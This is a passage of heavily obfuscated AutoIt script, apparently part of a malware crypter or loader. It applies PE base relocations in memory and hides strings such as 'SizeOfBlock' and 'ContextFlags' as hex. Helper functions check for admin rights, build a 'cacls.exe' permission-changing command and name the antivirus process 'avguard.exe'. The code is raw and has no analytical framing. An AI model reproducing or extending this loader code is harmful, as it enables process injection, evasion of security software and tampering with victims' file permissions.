1750. Local $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf, $jtwdxgbx5nmhwxn7tybjepiv8taesou, $vzwegjsslwnszv6e
1751. Local $lpkm1h3hiqbffod2npqxnmdz8engomm, $fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu, $xnqmjajbcib
1752. Local $twmpripm79sl = Int(ChrW("51")) + 7 * $cmnasi8pxhnoaau6rjtayo
1753. While $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj < $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul
1754. $7qmvohrm6jc9s = DllStructCreate(_zauoysuzmlereeujfkwlvy(), $vgcbb26bdutogbnp + $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj)
1755. $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf = DllStructGetData($7qmvohrm6jc9s, "V" & "i" & "r" & "t" & "u" & "a" & "l" & "Address")
1756. $jtwdxgbx5nmhwxn7tybjepiv8taesou = DllStructGetData($7qmvohrm6jc9s, BinaryToString("0X53697a654f66426c6f636b"))
1757. $vzwegjsslwnszv6e = ($jtwdxgbx5nmhwxn7tybjepiv8taesou - (((6 - 21) - 17) / ((StringLen("2") + ((Dec("1") / -1) * Int(Chr("51")))) - Int(ChrW(50))))) / 2
1758. $lpkm1h3hiqbffod2npqxnmdz8engomm = DllStructCreate(hsuakvazknwxbunnsnqlrovmtwlwqflka() & $vzwegjsslwnszv6e & cbxstjeryqrhpoxgtbhxk_wzvgxzxr(), DllStructGetPtr($7qmvohrm6jc9s) + StringLen("RNL6Bgsf"))
1759. For $fz3eclo13c4hpsztvduuwn10gcs = (Int(ChrW("49")) + 0) To $vzwegjsslwnszv6e
1760. $fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu = DllStructGetData($lpkm1h3hiqbffod2npqxnmdz8engomm, Dec("1"), $fz3eclo13c4hpsztvduuwn10gcs)
1761. If BitShift($fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu, 12) = $twmpripm79sl Then
1762. $xnqmjajbcib = DllStructCreate("pt" & "r", $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5 + $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf + BitAND($fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu, 4095))
1763. DllStructSetData($xnqmjajbcib, StringLen("I"), DllStructGetData($xnqmjajbcib, 1) + $grvxlhvk0axgbl1xfaxpe28wz)
1764. EndIf
1765. Next
1766. $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj += $jtwdxgbx5nmhwxn7tybjepiv8taesou
1767. WEnd
1768. Return Dec("1", 0)
1769. EndFunc
1770.  
1771. Func qvzvehgxhkjzwauiesstlqmfoohtexqnfxrzaudeciyqvnkiwf()
1772. Local $yqf8jxc25rntjmv8obncs = "0x436F6E74657874466C616773"
1773. Return $yqf8jxc25rntjmv8obncs
1774. EndFunc
1775.  
1776. Func xnzijqdtgsqsvfznaqmcqxomjylhi()
1777. Return Int(IsAdmin())
1778. EndFunc
1779.  
1780. Func bkmyzmqofazpp_gknotdxwesztvdldofdzwpg()
1781. Return ' /c cacls.exe "'
1782. EndFunc
1783.  
1784. Func ja_eftkmxypsfrlzelslpstbcdvlmlwowcbk()
1785. Local $uwimob2kkvexex403vkvi027iydbklcg1rzqsuyapt = "avguard.exe"
1786. Return $uwimob2kkvexex403vkvi027iydbklcg1rzqsuyapt
1787. EndFunc